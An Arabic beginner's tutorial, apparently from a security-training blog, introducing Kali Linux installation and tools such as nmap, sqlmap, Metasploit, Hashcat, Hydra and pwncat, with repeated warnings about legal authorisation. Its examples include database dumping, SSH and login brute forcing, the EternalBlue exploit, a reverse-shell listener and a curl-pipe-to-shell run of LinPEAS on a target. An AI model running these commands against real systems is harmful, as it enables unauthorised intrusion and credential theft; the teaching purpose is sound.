أدوات Kali Linux الأساسية للمبتدئين في 2026
19 أغسطس 2026 · بواسطة Pentevo
مقدمة
إذا كنت تفكر في دخول عالم الأمن السيبراني واختبار الاختراق، فمن المؤكد أنك سمعت باسم Kali Linux من قبل. هذا التوزيعة من نظام Linux أصبحت المرجع الأول للمخترقين الأخلاقيين حول العالم، وذلك بفضل مئات الأدوات المتخصصة التي تأتي مثبتة مسبقاً.
في هذا الدليل الشامل، ستتعرف على أهم أدوات Kali Linux مع أمثلة عملية حقيقية، وستفهم متى تستخدم كل أداة وكيف تبدأ رحلتك بشكل صحيح وآمن.
ما هو Kali Linux ولماذا يستخدمه المخترقون الأخلاقيون
Kali Linux هو توزيعة مبنية على Debian، طوّرتها شركة Offensive Security، وتحتوي على أكثر من 600 أداة متخصصة في مجالات الأمن السيبراني واختبار الاختراق والتحقيق الجنائي الرقمي.
يفضل المخترقون الأخلاقيون Kali لأسباب عدة:
- أدوات جاهزة للاستخدام دون الحاجة إلى تثبيت يدوي معقد
- تحديثات منتظمة تضمن توفر أحدث إصدارات الأدوات
- مجتمع واسع من المطورين والباحثين
- توثيق غني وشروحات وافرة عبر الإنترنت
كيف تثبت Kali Linux
قبل أن نبدأ باستعراض الأدوات، يجب أن تعرف خياراتك لتشغيل Kali:
1. الآلة الافتراضية (VM) — الخيار الأنسب للمبتدئين
تثبيت Kali داخل برنامج مثل VirtualBox أو VMware هو الخيار الأمثل للبدء. يتيح لك العمل على Kali دون المساس بنظامك الرئيسي، مع إمكانية أخذ لقطات (Snapshots) للرجوع إليها عند الحاجة.
# بعد تنزيل صورة Kali ISO من kali.org/get-kali
# أنشئ آلة افتراضية جديدة في VirtualBox
# خصص لها: 4GB RAM، 50GB تخزين، معالج افتراضي مزدوج
2. WSL2 على Windows
إذا كنت تعمل على Windows 10/11، يمكنك تشغيل Kali مباشرة:
wsl --install -d kali-linux
بعد التثبيت، شغّل Kali وثبّت الأدوات الأساسية:
sudo apt update && sudo apt install -y kali-linux-default
3. Dual Boot
خيار متقدم أكثر: تثبيت Kali جانب نظامك الحالي. مناسب لمن يريد الأداء الكامل، لكنه يتطلب تقسيم القرص الصلب.
أدوات الاستطلاع: اكتشاف الهدف قبل الهجوم
nmap — فاحص الشبكات الأشهر في العالم
nmap (Network Mapper) هو الأداة الأولى التي يتعلمها كل مخترق أخلاقي. تستخدمها لاكتشاف الأجهزة المتصلة بالشبكة والخدمات والمنافذ المفتوحة.
# فحص المنافذ الأساسية لهدف محدد
nmap 192.168.1.1
# فحص شامل مع تحديد نظام التشغيل والإصدارات
nmap -sV -O 192.168.1.1
# فحص الشبكة بأكملها
nmap 192.168.1.0/24
# فحص خفي (Stealth Scan) لتجنب الكشف
nmap -sS -T2 192.168.1.1
# تصدير النتائج إلى ملف
nmap -oN results.txt 192.168.1.1
theHarvester — جمع المعلومات من الإنترنت
أداة رائعة لجمع عناوين البريد الإلكتروني والنطاقات الفرعية وأسماء الموظفين من مصادر مفتوحة:
# جمع معلومات عن نطاق معين من Google
theHarvester -d example.com -b google
# البحث في مصادر متعددة
theHarvester -d example.com -b all
Shodan — محرك البحث للأجهزة المتصلة
Shodan ليس أداة مثبتة في Kali مباشرة بل خدمة على الإنترنت، لكن يمكن التفاعل معها عبر واجهة السطر:
pip install shodan
shodan init YOUR_API_KEY
shodan host 1.2.3.4
أدوات اختبار الويب: كشف ثغرات تطبيقات الإنترنت
Burp Suite — سكين الجيش السويسري لاختبار الويب
Burp Suite هو الأداة الأكثر استخداماً في اختبار أمان تطبيقات الويب. تعمل كوسيط (Proxy) بين متصفحك والخادم، مما يتيح لك التقاط الطلبات وتعديلها وتحليلها.
المهام الأساسية في Burp Suite:
- Intercept: التقاط الطلبات HTTP وتعديلها
- Repeater: إعادة إرسال الطلبات مع تغييرات
- Intruder: هجمات Brute Force وFuzz الآلي
- Scanner: فحص تلقائي للثغرات (النسخة Pro)
لتشغيل Burp Suite على Kali:
burpsuite
OWASP ZAP — البديل المجاني الكامل
إذا كنت تبحث عن بديل مجاني ومفتوح المصدر لـ Burp Suite:
zaproxy
ffuf — اكتشاف المسارات المخفية
أداة سريعة جداً للبحث عن صفحات ومجلدات مخفية:
# فحص المجلدات المخفية
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://example.com/FUZZ
# البحث عن ملفات بامتداد محدد
ffuf -w wordlist.txt -u http://example.com/FUZZ -e .php,.html,.txt
sqlmap — اكتشاف ثغرات SQL Injection تلقائياً
# فحص رابط لثغرات حقن SQL
sqlmap -u "http://example.com/page.php?id=1"
# استخراج قواعد البيانات
sqlmap -u "http://example.com/page.php?id=1" --dbs
# استخراج بيانات جدول محدد
sqlmap -u "http://example.com/page.php?id=1" -D database_name -T users --dump
nikto — فاحص ثغرات خوادم الويب
nikto -h http://example.com
أدوات الاستغلال: Metasploit Framework
Metasploit هو إطار عمل متكامل للاستغلال، يحتوي على آلاف الثغرات الجاهزة للاستخدام. يُعدّ من أقوى الأدوات وأكثرها شهرة في عالم الأمن السيبراني.
# تشغيل Metasploit
msfconsole
# البحث عن ثغرة محددة
msf> search eternalblue
# استخدام ثغرة محددة
msf> use exploit/windows/smb/ms17_010_eternalblue
# عرض الخيارات المطلوبة
msf> show options
# تحديد الهدف
msf> set RHOSTS 192.168.1.10
# تشغيل الاستغلال
msf> run
تحذير مهم: استخدم Metasploit فقط على أنظمة تخصك أو لديك إذن كتابي لاختبارها. استخدامه على أنظمة الغير بدون إذن يُعدّ جريمة يعاقب عليها القانون.
أدوات كلمات المرور: كسر التشفير واختبار القوة
John the Ripper — كاسر كلمات المرور الكلاسيكي
# كسر كلمة مرور من ملف hash
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# عرض كلمات المرور المكتشفة
john --show hashes.txt
# كسر hash محدد النوع
john --format=md5 --wordlist=wordlist.txt hashes.txt
Hashcat — الأسرع في كسر التشفير
Hashcat يستخدم قوة المعالج الرسومي (GPU) مما يجعله أسرع بكثير من John:
# كسر MD5 hash
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
# كسر NTLM hash (Windows)
hashcat -m 1000 hash.txt wordlist.txt
# هجوم القوة الغاشمة (Brute Force)
hashcat -m 0 hash.txt -a 3 ?a?a?a?a?a?a
Hydra — اختبار كلمات المرور على الخدمات
# اختبار كلمات مرور SSH
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
# اختبار نموذج تسجيل دخول ويب
hydra -l admin -P wordlist.txt 192.168.1.1 http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid credentials"
تحليل الشبكة: مراقبة حركة البيانات
Wireshark — مُحلّل حزم الشبكة الأشهر
Wireshark يتيح لك التقاط وتحليل كل حزمة بيانات تمر عبر الشبكة. واجهة رسومية قوية وبديهية.
# تشغيل Wireshark
wireshark
# التقاط حزم من واجهة محددة
wireshark -i eth0
# تصفية حزم HTTP فقط
# في شريط الفلترة اكتب: http
# تصفية حسب عنوان IP
# ip.addr == 192.168.1.1
tcpdump — التقاط الحزم من سطر الأوامر
# التقاط جميع الحزم على eth0
tcpdump -i eth0
# التقاط وحفظ في ملف
tcpdump -i eth0 -w capture.pcap
# قراءة ملف التقاط موجود
tcpdump -r capture.pcap
# فلترة حسب المنفذ
tcpdump -i eth0 port 80
# فلترة حسب IP المصدر
tcpdump -i eth0 src 192.168.1.100
أدوات Post-Exploitation: بعد الدخول
pwncat — إدارة الاتصالات العكسية
pwncat أداة متطورة لإدارة الـ reverse shells وتعزيز الوصول بعد الاختراق:
# تثبيت pwncat
pip install pwncat-cs
# الاستماع لاتصال عكسي
pwncat-cs -lp 4444
# الاتصال بهدف
pwncat-cs 192.168.1.10:4444
LinPEAS — فحص مسارات رفع الصلاحيات على Linux
بعد الوصول لنظام Linux، تساعدك LinPEAS في اكتشاف طرق رفع الصلاحيات:
# تنزيل وتشغيل LinPEAS على الجهاز المستهدف
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# أو تشغيله محلياً
chmod +x linpeas.sh
./linpeas.sh
نصائح ذهبية للمبتدئين
1. تدرّب في بيئة آمنة دائماً
لا تجرّب هذه الأدوات على شبكات أو أنظمة لا تملكها. استخدم منصات التدريب القانونية مثل:
- TryHackMe — مثالي للمبتدئين بواجهة عربية
- HackTheBox — تحديات واقعية متقدمة
- VulnHub — آلات افتراضية ضعيفة للتدريب المحلي
- DVWA (Damn Vulnerable Web Application) — تطبيق ويب ضعيف للتدريب
# تثبيت DVWA محلياً
sudo apt install apache2 php mysql-server php-mysql
# ثم تحميل DVWA من الموقع الرسمي
2. تعلم الأساسيات أولاً
قبل الغوص في الأدوات، تأكد من فهمك لـ:
- أوامر Linux الأساسية
- أساسيات الشبكات (TCP/IP، DNS، HTTP)
- أساسيات البرمجة (Python على الأقل)
3. احتفظ بملاحظاتك
استخدم أدوات مثل CherryTree أو Obsidian لتوثيق ما تتعلمه وما تكتشفه خلال الاختبارات.
4. اتجه نحو الشهادات المعترف بها
بعد إتقان الأدوات، فكر في الحصول على شهادات مثل:
- CEH (Certified Ethical Hacker)
- OSCP (Offensive Security Certified Professional)
- CompTIA Security+
خلاصة
Kali Linux يضع بين يديك ترسانة كاملة من أدوات الأمن السيبراني، لكن القوة الحقيقية تأتي من فهم كيفية استخدام هذه الأدوات بشكل صحيح وأخلاقي. ابدأ بأداة واحدة، أتقنها تماماً، ثم انتقل للتالية.
تذكر دائماً: المخترق الأخلاقي يختلف عن المجرم الإلكتروني في شيء واحد فقط — الإذن.
اقرأ أيضاً
الأسئلة الشائعة
هل Kali Linux للمبتدئين؟
نعم، يمكن للمبتدئين استخدام Kali Linux، لكن يُنصح أولاً بتعلم أساسيات Linux والشبكات قبل الغوص في أدوات الاختراق. ابدأ بتثبيته على آلة افتراضية لتجنب إتلاف نظامك الرئيسي.
ما أهم أداة في Kali Linux؟
لا توجد أداة واحدة 'الأهم'، فكل مرحلة من مراحل اختبار الاختراق تتطلب أدواتها. لكن إذا أردنا التعميم، فـ nmap للاستطلاع وMetasploit للاستغلال وWireshark لتحليل الشبكة تُعدّ من الأكثر استخداماً.
هل يمكن تثبيت Kali Linux على Windows؟
نعم، يمكنك تشغيل Kali Linux على Windows عبر WSL2 (Windows Subsystem for Linux) أو باستخدام برامج الآلة الافتراضية مثل VirtualBox أو VMware، أو عبر Dual Boot.
هل استخدام أدوات Kali Linux قانوني؟
استخدام أدوات Kali Linux قانوني فقط على الأنظمة التي تملكها أو لديك إذن صريح وكتابي باختبارها. اختبار أي نظام دون إذن يُعدّ جريمة إلكترونية في معظم دول العالم.
مقالات ذات صلة
أفضل أدوات اختبار الاختراق في 2026
أدوات اختبار الاختراق الأساسية التي ينبغي لكل مخترق أخلاقي معرفتها — ماسحات، ووكلاء بروكسي، وأطر استغلال والمزيد، مع أفضل استخدام لكل منها.
Toolsأفضل أدوات الاختراق الأخلاقي في 2026 (مجانية وأساسية)
أهم أدوات الاختراق الأخلاقي في 2026 — للاستطلاع والفحص واختبار الويب والاستغلال والمزيد. ماذا تفعل كل أداة وأين تتعلّمها.
Toolsأوامر Nmap: ورقة الغش العملية (2026)
أوامر Nmap التي ستستخدمها فعلًا — اكتشاف المضيفين، وفحص المنافذ، وكشف الخدمات ونظام التشغيل، والتوقيت، ومحرّك السكربتات NSE — مع أمثلة.
ToolsKali Linux للمبتدئين: البداية في 2026
ما هو Kali Linux، ولمن هو موجّه، وكيف تثبّته بأمان، والأوامر والأدوات الأساسية لبدء رحلتك في الاختراق الأخلاقي.
طبّق هذا عمليًا
أكاديمية Pentevo تحوّل هذه المفاهيم إلى دروس موجّهة وفيديوهات واختبارات — مجانًا.
ابدأ التعلّم مجانًا